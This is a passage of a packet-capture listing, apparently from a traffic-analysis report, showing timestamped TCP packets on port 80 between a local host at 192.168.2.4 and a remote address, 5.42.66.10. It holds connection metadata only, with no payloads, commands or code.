May 6, 2024 07:53:08.452593088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452596903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452609062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452625990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452627897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452641010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452645063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452663898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452666998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452676058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452681065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452692986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452713966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452740908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452860117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452872038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452883005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452893972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452902079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452905893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452914000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452918053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452929974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452940941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452944040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452951908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452963114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452963114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452975035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452985048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452987909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452997923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453010082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453013897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453023911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453032970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453053951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453074932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453166008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453176975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453187943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453200102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453201056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453212976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453213930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453224897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453237057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453238964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453248978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453270912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453283072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453300953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453321934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453334093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453337908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453345060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453356981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453365088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453373909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453376055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453386068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453403950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453430891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453430891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453444004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453454971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453466892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453468084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453479052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453495026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453520060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453614950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453625917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453636885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453649998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453649998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453660965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453671932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453677893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453685999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453697920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453702927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453721046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453732014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453854084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453865051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453876019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453887939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453893900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453900099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453902960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453912973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453924894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453924894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453938007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453948021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453950882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453963041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.453965902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.453989029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454011917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454022884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454035044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454046011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454057932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454061031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454071045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454073906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454082012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454092026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454094887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454108953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454109907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454123974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454135895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454142094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454149008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454152107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454159975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454173088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454184055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454185009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454199076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454211950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454211950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454222918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454229116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454235077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454246998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454257011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454266071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454283953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454287052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454297066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454301119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454329014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454334974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454355001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454380035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454530954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454541922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454551935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454564095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454569101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454575062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454581976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454586983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454598904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454601049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454617977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454627037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454628944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454633951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454639912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454653025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454665899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454673052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454680920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454694986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454708099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454736948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454850912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454863071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454874039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.454890013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454900980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.454919100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455043077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455054045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455061913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455073118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455085039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455090046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455096960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455108881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455113888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455120087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455131054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455132008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455144882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455153942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455174923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455219030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455231905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455243111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455255032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455259085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455266953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455277920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455281973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455290079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455302000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455307007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455323935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455347061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455384016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455395937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455406904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455418110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455424070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455430031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455444098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455447912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455456018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455467939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455471039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455480099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455490112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455502033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455532074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455549002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455559969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455570936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455585003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455585957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455596924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455598116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455610991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455621004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455642939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455718040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455730915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455741882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455754042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455758095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455765009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455776930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455784082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455790043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455801964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455809116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455825090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455831051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.455847979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.455873966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.698640108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698657990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698669910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698681116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698692083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698704958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698715925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698739052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698749065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.698750973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698800087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.698832035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698844910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698856115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698867083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698874950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.698878050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698899984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.698925018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.698945999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698957920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698968887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698980093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698986053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.698993921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.698993921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699007034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699018002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699018955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699029922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699042082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699048042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699058056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699069977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699074030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699081898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699099064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699104071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699116945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699126005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699127913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699141026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699146032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699153900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699166059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699168921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699182987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699193954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699197054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699208021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699238062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699278116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699281931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699291945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699301958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699312925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699322939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699326038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699336052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699337959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699350119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699362040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699362993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699374914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699378967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699388027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699398994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699402094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699410915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699426889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699428082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699439049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699445009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699450970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699462891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699469090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699476004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699486971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699491978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699497938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699505091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699510098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699522972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699546099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699546099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699554920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699558020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699568987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699575901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699582100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699594021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699594021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699606895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699610949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699620008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699630976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699650049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699655056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699664116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699668884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699676037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699687958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699690104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699701071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699701071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699713945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699719906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699727058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699737072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699739933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699760914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.699771881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.699788094 CEST	80	49741	5.42.66.10	192.168.2.4
